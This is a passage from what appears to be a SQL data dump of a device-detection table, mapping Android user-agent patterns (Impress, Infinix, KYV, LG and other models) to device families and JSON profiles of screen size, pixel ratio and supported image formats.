Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Blade) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Cube) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Fire) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Flash) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Forest) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Phonic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Rosso) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Win) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress_Zeon4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X5514D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X5515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X5515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X573) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X604) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X606) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X606B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X606C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X606D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X608) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":754,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X622) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X623) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X623B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X624) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X624B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Infinix X650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JKM-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JKM-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JKM-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-AL00a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; JSN-L42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Jade7s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Joy 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Joy 1+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K7 Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K700A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; K8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KING_KONG_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KIREI A5Q PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KNT-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KNT-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KODAK_SMARTWAY_L1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KRIP_K4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KRIP_K55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KS907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KS964) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KYV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KYV44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; KYV44_u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Konnect402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Konnect602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Konnect_607) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":300,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L18011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L590A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":427,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; L601F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LA6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LDN-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LDN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LDN-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LDN-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LDN-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LEX820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-AS993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-F700L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-F700S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 